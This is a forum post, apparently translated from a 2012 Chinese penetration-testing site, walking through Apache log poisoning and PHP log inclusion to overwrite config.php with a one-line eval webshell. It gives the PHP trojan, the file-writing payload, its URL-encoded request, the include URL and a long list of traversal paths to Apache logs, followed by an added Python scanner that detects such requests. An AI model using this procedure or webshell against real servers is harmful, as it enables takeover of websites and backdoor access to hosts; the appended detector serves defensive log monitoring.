China Network Penetration Testing Alliance

Title: PHP include of the Apache log to write a shell

Author: admin    Time: 2012-9-15 14:27
Because the method above is not very practical (in my testing I found that the log is routinely tens of megabytes, which takes the fun out of it), let us take it a step further: write a genuinely usable webshell, which also beats the painfully slow approach above.

For example, take the same one-line trojan:
<?eval($_POST[cmd]);?>
1 p! p  C5 ~% X7 w" I& g/ \
By now you have probably thought of it: this is quite a good approach. Next, how to write it becomes the question. Use the following: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Joined into a single PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   // write the one-line trojan statement into config.php
7 s4 m5 u7 M/ I; j5 w; ?# A
We submit this statement, let Apache record it in the error log, then include the log, and the shell is written. Remember that it must be converted to URL-encoded form for this to work.
Converted to:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
  h% I* G  d! l/ O: Z8 y
Now the error log contains this line of webshell-writing code.
Then we include the log, submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written: config.php now holds the one-line trojan statement.
OK.
http://www.xxx.com/forum/config.php has become our webshell.
Connect to it with lanker's client and the host is yours.
. u0 A0 v! |" {: I% j4 \6 m: v+ t+ ?1 ?3 q1 o7 L
PS: Everything above presupposes that the directory is writable; it must be -rwxrwxrwx (777) for this to proceed, and you can check that directly on the directory listed above. Everything above is exploitation with the log path already known.
: u9 K( g2 {+ C' B5 w' m& h! O' R
Other log paths you can guess, or refer to this list:
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log

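From the defender's side, both requests in the procedure above leave a trace in the Apache access log: the URL-encoded PHP that ends up written into the log, and the include of a log path through a script parameter. The scanner below is an added example, not code from the original post; the log lines are constructed, and the set of log locations is an assumption drawn from the directories listed in the post.

```python
# Added example, not from the original post: flag the two request types the
# post relies on in Apache access-log lines. Sample lines are constructed.
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed Apache log locations, taken from the directories the post lists.
LOG_DIRS = {"/var/log/httpd", "/var/log/apache", "/var/log",
            "/etc/httpd/logs", "/var/www/logs", "/usr/local/apache/logs"}
LOG_FILES = {"access_log", "access.log", "error_log", "error.log"}
PHP_CODE = re.compile(r"<\?|\beval\s*\(|\bfopen\s*\(", re.I)  # poisoning marker
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def decode(value):
    """URL-decode until stable, so double-encoded payloads are exposed too."""
    previous = None
    while value != previous:
        previous, value = value, unquote(value)
    return value

def points_at_log(value):
    """True if a parameter value resolves to a known Apache log file.
    Traversal is collapsed by anchoring at /, a heuristic since the real
    base is the including script's directory."""
    path = posixpath.normpath("/" + decode(value).lstrip("/"))
    return (posixpath.dirname(path) in LOG_DIRS
            and posixpath.basename(path) in LOG_FILES)

def classify(line):
    """Findings for one access-log line: [] when nothing is suspicious."""
    match = REQUEST.search(line)
    if not match:
        return []
    raw_target = match.group(1)
    findings = []
    if PHP_CODE.search(decode(raw_target)):
        findings.append("php-code-in-request")   # code written into the log
    for _, val in parse_qsl(urlsplit(raw_target).query, keep_blank_values=True):
        if points_at_log(val):
            findings.append("log-file-inclusion")  # include of a log path
            break
    return findings

SAMPLE = [  # constructed: a poisoning request, a log include, a benign request
    '1.2.3.4 - - [15/Sep/2012:14:27:01 +0800] "GET /%3C%3Feval%28%24_POST%5Bcmd%5D%29%3B%3F%3E HTTP/1.1" 404 209',
    '1.2.3.4 - - [15/Sep/2012:14:27:09 +0800] "GET /z.php?zizzy=../../../../var/log/httpd/error_log HTTP/1.1" 200 1532',
    '5.6.7.8 - - [15/Sep/2012:14:30:00 +0800] "GET /forum/index.php?page=2 HTTP/1.1" 200 8812',
]
```

A 404 on the poisoning request is expected and is exactly why the payload lands in the error log; the finding is the decoded request content, not the status code.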



Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2